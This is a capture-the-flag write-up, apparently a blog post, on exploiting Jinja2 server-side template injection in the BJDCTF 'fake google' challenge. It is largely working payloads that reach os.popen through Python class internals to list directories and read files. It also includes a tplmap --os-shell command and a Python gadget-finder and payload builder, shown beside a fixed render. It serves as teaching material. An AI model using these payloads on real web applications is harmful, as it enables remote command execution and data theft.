BUU BJDCTF fake google (SSTI template injection) write-up: a casual study of template injection

http://39.96.86.88/2020/04/03

The page gives a hint, so this is template injection beyond doubt. Verify it first.
[Figure 1: screenshot from the original post]

Locate the object base class (either __bases__ or the full MRO works):
	{{"".__class__.__bases__}}
	{{"".__class__.__mro__}}

Reach os through the object class. __init__ is the class's initialiser (a Python function), and its __globals__ is the dictionary of the module that defined it, so every import, function and variable of that module becomes reachable. Index 117 in __subclasses__() is specific to the target's Python build and import order; on another interpreter the list is ordered differently, so dump the list first and pick the entry whose module exposes popen (that is os._wrap_close, the direct object subclass defined in os.py):
	{{"".__class__.__mro__[1].__subclasses__()[117]}}
	{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__}}
	
Use popen from those globals to find readable files (the slash here is a directory separator: `dir /` and `dir` list different paths):
	{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('dir /').read()}}
Read the flag:
	{{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}

Flag found.

Too much hassle? tplmap has you covered.
https://github.com/epinna/tplmap
python tplmap.py -u '<url>?name=' --os-shell

Beginners should still inject by hand and adjust to whatever environment they are facing.

Payload from the official write-up (it searches __subclasses__() by class name rather than by index, so it does not depend on where the gadget sits in the list):
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

A payload from an experienced player (it works because Flask's config object is defined in flask.config, a module that imports os):
	{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
	
Payload variants collected from other write-ups (see the links below):
1.
Jinja2 SSTI command-execution payload. This is the generic Jinja2 RCE payload: it walks the subclasses of object, stops at catch_warnings (from the warnings module) and reaches eval through that module's __builtins__:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
2.
List the root directory; the response shows the flag is there:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()") }}{% endif %}{% endfor %}
Read the flag:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
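The hard-coded index [117] in the manual payloads and the name-matching loop payloads are two answers to the same problem: the position of the os gadget in object.__subclasses__() changes between Python builds. The Python below is an added example, not code from the original write-up or from the challenge. It finds the gadget by inspecting each class's __init__.__globals__ instead of guessing an index, emits the loop-form Jinja2 payload for whatever class name it found, and shows the bug class behind the challenge (user input spliced into template source) next to the fixed render. The `render_user_input` helper, the `echo gadget-ok` command and the optional jinja2 import are assumptions made for illustration.

```python
# Added example (not from the original write-up): locate the os/popen gadget by
# name instead of trusting a hard-coded __subclasses__() index such as [117],
# which depends on the target's Python build and import order. Standard library
# only; the final Jinja2 step is skipped when jinja2 is not installed.


def find_gadgets(wanted=("popen", "os")):
    """Return [(index, module.ClassName, key)] for every direct subclass of
    object whose __init__ is a Python function and whose module globals
    contain one of the wanted names. This is the programmatic form of
    {{ "".__class__.__mro__[1].__subclasses__()[N].__init__.__globals__ }}."""
    hits = []
    for index, cls in enumerate(object.__subclasses__()):
        init_globals = getattr(getattr(cls, "__init__", None), "__globals__", None)
        if not isinstance(init_globals, dict):  # C-implemented __init__: no globals
            continue
        for key in wanted:
            if key in init_globals:
                hits.append((index, f"{cls.__module__}.{cls.__name__}", key))
                break
    return hits


def run_via_gadget(cmd):
    """Run cmd through the first class whose module globals expose a callable
    popen (os._wrap_close on CPython): exactly what the [117] payload does."""
    for cls in object.__subclasses__():
        init_globals = getattr(getattr(cls, "__init__", None), "__globals__", None)
        if isinstance(init_globals, dict) and callable(init_globals.get("popen")):
            return init_globals["popen"](cmd).read()
    raise RuntimeError("no popen gadget reachable from object.__subclasses__()")


def build_payload(class_name, cmd):
    """Jinja2 payload in the name-matching loop form used in the write-up, so
    the same string works wherever class_name sits in the subclass list."""
    return (
        "{% for c in [].__class__.__base__.__subclasses__() %}"
        "{% if c.__name__ == '" + class_name + "' %}"
        "{{ c.__init__.__globals__['popen']('" + cmd + "').read() }}"
        "{% endif %}{% endfor %}"
    )


def render_user_input(user_input, safe=True):
    """Hypothetical render helper showing the bug class next to the fix.
    Vulnerable (safe=False): user input is concatenated into the template
    *source*, so any {{ ... }} in it is evaluated, as in the challenge.
    Safe (safe=True): the template is fixed and the input is passed as a
    variable, so it is only ever data. Returns None when jinja2 is not
    installed so the rest of the example still runs offline."""
    try:
        import jinja2
    except ImportError:
        return None
    if safe:
        tpl = jinja2.Environment(autoescape=True).from_string("<h1>{{ name }}</h1>")
        return tpl.render(name=user_input)
    return jinja2.Environment().from_string("<h1>" + user_input + "</h1>").render()


if __name__ == "__main__":
    for index, name, key in find_gadgets():
        print(f"[{index}] {name} -> __init__.__globals__ has {key!r}")
    print(run_via_gadget("echo gadget-ok").strip())        # gadget-ok
    print(render_user_input("{{ 7*7 }}", safe=False))      # <h1>49</h1> when jinja2 is installed
    print(render_user_input("{{ 7*7 }}", safe=True))       # <h1>{{ 7*7 }}</h1> when jinja2 is installed
    print(render_user_input(build_payload("_wrap_close", "echo gadget-ok"), safe=False))
```

Run it on the interpreter you are attacking from and compare the printed index of os._wrap_close with the target's: the two usually differ, which is why the loop form by class name survives across environments while a fixed [117] does not. The safe branch is the fix for the challenge's bug: the template text is constant and user input only ever arrives through a variable.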


References:
https://blog.csdn.net/SopRomeo/article/details/105123395
https://blog.csdn.net/qq_40648358/article/details/105011659
https://blog.csdn.net/qq_40827990/article/details/82940894
https://blog.csdn.net/zz_Caleb/article/details/96480967
